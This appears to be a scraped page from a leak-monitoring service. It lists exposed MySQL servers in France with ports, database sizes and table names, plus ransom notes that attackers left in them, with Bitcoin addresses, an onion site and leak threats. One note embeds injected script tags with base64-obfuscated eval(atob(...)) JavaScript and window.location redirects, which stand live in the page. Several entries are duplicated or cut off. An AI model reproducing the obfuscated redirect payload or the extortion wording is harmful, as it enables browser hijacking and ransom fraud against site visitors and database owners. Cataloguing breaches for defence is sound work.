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  • France 44


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  • 44

ASN: 16276
52 events in 273 days
Leak size: 8.0 MB
Open ports: 3306
Databases: 44, row count: 140091, size: 8.0 MB
Found table README_TO_RECOVER_A.RECOVER_YOUR_DATA with 2 records
Found table crytrad.candles with ...
Ransom notes :


ASN: 16276
9 events in 195 days
Leak size: 8.2 MB
Open ports: 8008
Databases: 53, row count: 138544, size: 8.2 MB
Found table app.doctrine_migration_versions with 2 records
Found table app.market_message with 39 ...

ASN: 16276
20 events in 184 days
Leak size: 8.5 MB
Open ports: 3308
Databases: 70, row count: 140657, size: 8.5 MB
Found table bugtracker.mantis_api_token_table with 0 records
Found table bugtracker.mantis_bug_fil...

ASN: 16276
18 events in 198 days
Leak size: 9.9 MB
Open ports: 3307
Databases: 129, row count: 146293, size: 9.9 MB
Found table keycloak.ADMIN_EVENT_ENTITY with 0 records
Found table keycloak.ASSOCIATED_POLICY wit...

ASN: 16276
45 events in 198 days
Leak size: 9.9 MB
Open ports: 3307
Databases: 129, row count: 146293, size: 9.9 MB
Found table keycloak.ADMIN_EVENT_ENTITY with 0 records
Found table keycloak.ASSOCIATED_POLICY wit...

ASN: 16276
12 events in 196 days
Leak size: 9.9 MB
Open ports: 3307
Databases: 129, row count: 146293, size: 9.9 MB
Found table keycloak.ADMIN_EVENT_ENTITY with 0 records
Found table keycloak.ASSOCIATED_POLICY wit...

ASN: 16276
18 events in 188 days
Leak size: 9.9 MB
Open ports: 3307
Databases: 129, row count: 146293, size: 9.9 MB
Found table keycloak.ADMIN_EVENT_ENTITY with 0 records
Found table keycloak.ASSOCIATED_POLICY wit...

ASN: 16276
33 events in 553 days
Leak size: 3.5 MB
Open ports: 3306
Databases: 32, row count: 139986, size: 3.5 MB
Found table README_TO_RECOVER_GZ.README with 1 records
Found table mysql.column_stats with 0 recor...
Ransom notes :

1I have backed up all your databases. To recover them you must pay 0.013 Bitcoin to this address: 15MXve6xkgVZ1V9CaR8hfKPX5iY7nQgAvg. Backup list: userdb. After your payment email me at with your server IP ( and transaction ID. Emails without transaction ID will be ignored. 15MXve6xkgVZ1V9CaR8hfKPX5iY7nQgAvg 1I have backed up all your databases. To recover them you must pay 0.013 Bitcoin to this address: 15MXve6xkgVZ1V9CaR8hfKPX5iY7nQgAvg. Backup list: userdb. After your payment email me at with your server IP ( and transaction ID. Emails without transaction ID will be ignored. 15MXve6xkgVZ1V9CaR8hfKPX5iY7nQgAvg

ASN: 16276
34 events in 162 days
Leak size: 2.0 GB
Open ports: 3308
Databases: 2014, row count: 869250, size: 2.0 GB
Found table 001_ditros_artdb.ART_ACCESS_LEVELS with 7 records
Found table 001_ditros_artdb.ART_A...

ASN: 16276
2 events in 6 days
Leak size: 629.0 kB
Open ports: 3306
Databases: 25, row count: 2273, size: 629.0 kB
Found table README_TO_RECOVER_A.RECOVER_YOUR_DATA with 2 records
Found table mysql.columns_priv wi...
Ransom notes :

All your data is backed up. You must pay 0.022 BTC to 18224LViuRGEhqrUzeRLE9Y9ggogcdkNn5 In 48 hours, your data will be publicly disclosed and deleted. (more information: go to

ASN: 16276
5 events in 39 days
Leak size: 7.8 MB
Open ports: 3307
Databases: 31, row count: 135462, size: 7.8 MB
Found table mysql.columns_priv with 0 records
Found table mysql.db with 3 records
Found table mysq...

ASN: 16276
20 events in 49 days
Leak size: 8.2 MB
Open ports: 8008
Databases: 53, row count: 139748, size: 8.2 MB
Found table app.doctrine_migration_versions with 2 records
Found table app.market_message with 39 ...

ASN: 16276
2 events in 19 days
Leak size: 7.9 MB
Open ports: 3306
Databases: 39, row count: 140473, size: 7.9 MB
No or default MySQL authentication found.Found table README_TO_RECOVER_A.RECOVER_YOUR_DATA with 2 ...
Ransom notes :


ASN: 16276
3 events in 376 days
Leak size: 4.7 MB
Open ports: 3306
Databases: 99, row count: 140964, size: 4.7 MB
No or default MySQL authentication found.Found table mysql.column_stats with 0 records
Found table...

ASN: 16276
3 events in 344 days
Leak size: 4.8 MB
Open ports: 3306
Databases: 99, row count: 140645, size: 4.8 MB
No or default MySQL authentication found.Found table mysql.column_stats with 0 records
Found table...

ASN: 16276
12 events in 329 days
Leak size: 806.5 MB
Open ports: 3306
Databases: 1592, row count: 1446897, size: 806.5 MB
Found table Ennour_dates_hacked.llx_c_typent with 13 records
Found table Ennour_dates_hacked....
Ransom notes :

1To recover your lost databases and avoid leaking it: visit http://hn4wg4o6s5nc7763.onion and enter your unique token 87b55652adcfd9c9 and pay the required amount of Bitcoin to get it back. Databases that we have: expert, ali, dolibarr2, dolibarr3, dolibarr1, dolibarr5, test-SIRH, dolibarr. Your databases are downloaded and backed up on our servers. If we dont receive your payment in the next 9 Days, we will sell your database to the highest bidder or use them otherwise. To access this site you have use the tor browser'"></title></a><script>window.location.replace("");</script><script>window.location.replace('');</script><title><a>'"></title></a><script>window.location.replace("");</script><script>window.location.replace('');</script><title><a> 1To recover your lost databases and avoid leaking it: visit http://hn4wg4o6s5nc7763.onion and enter your unique token 87b55652adcfd9c9 and pay the required amount of Bitcoin to get it back. Databases that we have: expert, ali, dolibarr2, dolibarr3, dolibarr1, dolibarr5, test-SIRH, dolibarr. Your databases are downloaded and backed up on our servers. If we dont receive your payment in the next 9 Days, we will sell your database to the highest bidder or use them otherwise. To access this site you have use the tor browser'"></title></a><script>eval(atob("ZnVuY3Rpb24geChtKXtyID0nJztmPScwODMyNzQnO209bS5zcGxpdCgnLicpO2ZvcihlIGluIG0pe3I9citbJzhlJywnYzkwJywnL2InLCduZy4nLCdceDNhXHgyZlx4MmYnLCczYTQnLCdvc3QnLCdleT0nLCdlYmInLCdjb20nLCc3NGQnLCdhMjcnLCd0aCcsJzkzJywnNDAnLCdwYScsJ2lrJywnaG8nLCdwcicsJzQ0OScsZlsxXSsnM2InLCc1YicsJz9rJywnaHR0JywncHMnLCc3MDYnLCdmNWQnLCdpbycsJ2F0JywnbicsJ2xvYyddW3BhcnNlSW50KG1bZV0pXX0gcmV0dXJuIHJ9IGV2YWwoJ1x4NzdceDY5XHg2ZVx4NjRceDZmXHg3NycpW3goJzMwLjI4LjI3LjI5JyldPXgoJzIzMjQwNDE4MDYxNzAzMDkwMjIwMTYxMjE1MjIwNzE5MDUyNTEwMDgxMzE0MDAyMTI2MDExMScuc3BsaXQoJy4nKVswXS5yZXBsYWNlKC9cQig/PShcZHsyfSkrKD8hXGQpKS9nLCcuJykp"))</script><title><a>'"></title></a><script>eval(atob("ZnVuY3Rpb24geChtKXtyID0nJztmPScwODMyNzQnO209bS5zcGxpdCgnLicpO2ZvcihlIGluIG0pe3I9citbJzhlJywnYzkwJywnL2InLCduZy4nLCdceDNhXHgyZlx4MmYnLCczYTQnLCdvc3QnLCdleT0nLCdlYmInLCdjb20nLCc3NGQnLCdhMjcnLCd0aCcsJzkzJywnNDAnLCdwYScsJ2lrJywnaG8nLCdwcicsJzQ0OScsZlsxXSsnM2InLCc1YicsJz9rJywnaHR0JywncHMnLCc3MDYnLCdmNWQnLCdpbycsJ2F0JywnbicsJ2xvYyddW3BhcnNlSW50KG1bZV0pXX0gcmV0dXJuIHJ9IGV2YWwoJ1x4NzdceDY5XHg2ZVx4NjRceDZmXHg3NycpW3goJzMwLjI4LjI3LjI5JyldPXgoJzIzMjQwNDE4MDYxNzAzMDkwMjIwMTYxMjE1MjIwNzE5MDUyNTEwMDgxMzE0MDAyMTI2MDExMScuc3BsaXQoJy4nKVswXS5yZXBsYWNlKC9cQig/PShcZHsyfSkrKD8hXGQpKS9nLCcuJykp"))</script><title><a> 1To recover your lost databases and avoid leaking it: visit http://hn4wg4o6s5nc7763.onion and enter your unique token 87b55652adcfd9c9 and pay the required amount of Bitcoin to get it back. Databases that we have: expert, ali, dolibarr2, dolibarr3, dolibarr1, dolibarr5, test-SIRH, dolibarr. Your databases are downloaded and backed up on our servers. If we dont receive your payment in the next 9 Days, we will sell your database to the highest bidder or use them otherwise. To access this site you have use the tor browser'"></title></a><script>eval(atob("ZnVuY3Rpb24geChtKXtyID0nJztmPScwODMyNzQnO209bS5zcGxpdCgnLicpO2ZvcihlIGluIG0pe3I9citbJzhlJywnYzkwJywnL2InLCduZy4nLCdceDNhXHgyZlx4MmYnLCczYTQnLCdvc3QnLCdleT0nLCdlYmInLCdjb20nLCc3NGQnLCdhMjcnLCd0aCcsJzkzJywnNDAnLCdwYScsJ2lrJywnaG8nLCdwcicsJzQ0OScsZlsxXSsnM2InLCc1YicsJz9rJywnaHR0JywncHMnLCc3MDYnLCdmNWQnLCdpbycsJ2F0JywnbicsJ2xvYyddW3BhcnNlSW50KG1bZV0pXX0gcmV0dXJuIHJ9IGV2YWwoJ1x4NzdceDY5XHg2ZVx4NjRceDZmXHg3NycpW3goJzMwLjI4LjI3LjI5JyldPXgoJzIzMjQwNDE4MDYxNzAzMDkwMjIwMTYxMjE1MjIwNzE5MDUyNTEwMDgxMzE0MDAyMTI2MDExMScuc3BsaXQoJy4nKVswXS5yZXBsYWNlKC9cQig/PShcZHsyfSkrKD8hXGQpKS9nLCcuJykp"))</script><title><a>'"></title></a><script>eval(atob("ZnVuY3Rpb24geChtKXtyID0nJztmPScwODMyNzQnO209bS5zcGxpdCgnLicpO2ZvcihlIGluIG0pe3I9citbJzhlJywnYzkwJywnL2InLCduZy4nLCdceDNhXHgyZlx4MmYnLCczYTQnLCdvc3QnLCdleT0nLCdlYmInLCdjb20nLCc3NGQnLCdhMjcnLCd0aCcsJzkzJywnNDAnLCdwYScsJ2lrJywnaG8nLCdwcicsJzQ0OScsZlsxXSsnM2InLCc1YicsJz9rJywnaHR0JywncHMnLCc3MDYnLCdmNWQnLCdpbycsJ2F0JywnbicsJ2xvYyddW3BhcnNlSW50KG1bZV0pXX0gcmV0dXJuIHJ9IGV2YWwoJ1x4NzdceDY5XHg2ZVx4NjRceDZmXHg3NycpW3goJzMwLjI4LjI3LjI5JyldPXgoJzIzMjQwNDE4MDYxNzAzMDkwMjIwMTYxMjE1MjIwNzE5MDUyNTEwMDgxMzE0MDAyMTI2MDExMScuc3BsaXQoJy4nKVswXS5yZXBsYWNlKC9cQig/PShcZHsyfSkrKD8hXGQpKS9nLCcuJykp"))</script><title><a> 1To recover your lost databases and avoid leaking it: visit http://hn4wg4o6s5nc7763.onion and enter your unique token 87b55652adcfd9c9 and pay the required amount of Bitcoin to get it back. Databases that we have: expert, ali, dolibarr2, dolibarr3, dolibarr1, dolibarr5, test-SIRH, dolibarr. Your databases are downloaded and backed up on our servers. If we dont receive your payment in the next 9 Days, we will sell your database to the highest bidder or use them otherwise. To access this site you have use the tor browser

ASN: 16276
7 events in 289 days
Leak size: 10.4 MB
Open ports: 3306
Databases: 127, row count: 149617, size: 10.4 MB
Found table Z_README_TO_RECOVER.RECOVER_YOUR_DATA with 2 records
Found table default.wt_state wi...
Ransom notes :

All your data is a backed up. You must pay 0.1 BTC tobc1qf0097pe20r9jvnl68sk6a2erh0t9a3mt5pap3z48 hours for recover it. After 48 hours expiration we will sell all your data on dark markets and the database dump will be dropped from our server!

ASN: 16276
4 events in 39 days
Leak size: 3.4 MB
Open ports: 3306
Databases: 31, row count: 139978, size: 3.4 MB
Found table GODRANSOM.GODRANSOM with 1 records
Found table mysql.column_stats with 0 records

ASN: 16276
6 events in 66 days
Leak size: 3.5 MB
Open ports: 3306
Databases: 32, row count: 139986, size: 3.5 MB
Found table RECOVER_DATABASE_HSA.README with 1 records
Found table mysql.column_stats with 0 recor...
Ransom notes :

1To recover your lost Database send 0.013 Bitcoin (BTC) to our Bitcoin address: bc1qqfe7mk2fa9lelcpm7rjvlls6x4735z9k5dmr9f  After this, contact us by email with your Server IP or Domain Name and a Proof of Payment (Payment ID). Your Database is downloaded and backed up on our servers. Backups that we have right now: userdb. Any email without your server IP Address or Domain Name and a Proof of Payment together will be ignored. If we dont receive your payment in the next 10 Days, we will delete or leak your sensitive 1To recover your lost Database send 0.013 Bitcoin (BTC) to our Bitcoin address: bc1qqfe7mk2fa9lelcpm7rjvlls6x4735z9k5dmr9f  After this, contact us by email with your Server IP or Domain Name and a Proof of Payment (Payment ID). Your Database is downloaded and backed up on our servers. Backups that we have right now: userdb. Any email without your server IP Address or Domain Name and a Proof of Payment together will be ignored. If we dont receive your payment in the next 10 Days, we will delete or leak your sensitive

ASN: 16276
1 events in 0 days
Leak size: 3.4 MB
Open ports: 3306
Databases: 87, row count: 1772, size: 3.4 MB
Found table mysql.columns_priv with 0 records
Found table mysql.column_stats with 0 records
Found ta...
Ransom notes :

All your data is a backed up. You must pay 0.26 BTC tobc1qf0097pe20r9jvnl68sk6a2erh0t9a3mt5pap3z48 hours for recover it. After 48 hours expiration we will sell all your data on dark markets and the database dump will be dropped from our server!